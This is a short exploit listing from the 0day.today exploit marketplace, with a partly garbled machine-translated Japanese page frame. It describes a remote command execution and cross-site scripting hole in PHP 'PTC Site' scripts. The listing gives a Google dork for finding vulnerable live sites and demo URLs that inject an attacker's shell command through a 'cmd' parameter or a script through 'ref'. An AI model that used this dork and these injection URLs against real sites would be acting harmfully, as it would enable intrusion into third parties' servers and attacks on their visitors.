[ 承認 ] [ 登録 ] [ アカウントの復元 ]
お問い合わせ
次の方法でご連絡することができます:
0day.today  Inj3ct0rエクスプロイト市場とエクスプロイトの危険は,データベースを利用します

PTC Site's RCE/XSS Vulnerability

著者
CrazyMember
リスク
[
セキュリティリスクは,被保険者
]
0day-ID
0day-ID-12463
カテゴリ
web applications
日付の追加
30-05-2010
プラットフォーム
php
================================
PTC Site's RCE/XSS Vulnerability
================================


$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
 
@Title: PTC Site's RCE/XSS Vulnerability
@Vendor: http://www.ptcsites4sale.info & and etc...:D
@Author: CrazyMember
@SPC Thanks: XroGuE 4 r3p0r7 :P
@Dork:"intext:Warning: passthru()" "inurl:view=help"
 
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
 
@Bug: http://[site]/index.php?view=help&faq=1&ref=[RCE/XSS/HTML]
 
Demo:
 
#http://[site]/index.php?view=help&faq=1&ref=marykarma&cmd=[Your Commond]
#http://[site]/index.php?view=help&faq=1&ref=[Your ScripT]
 
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$



#  0day.today [2024-07-02]  #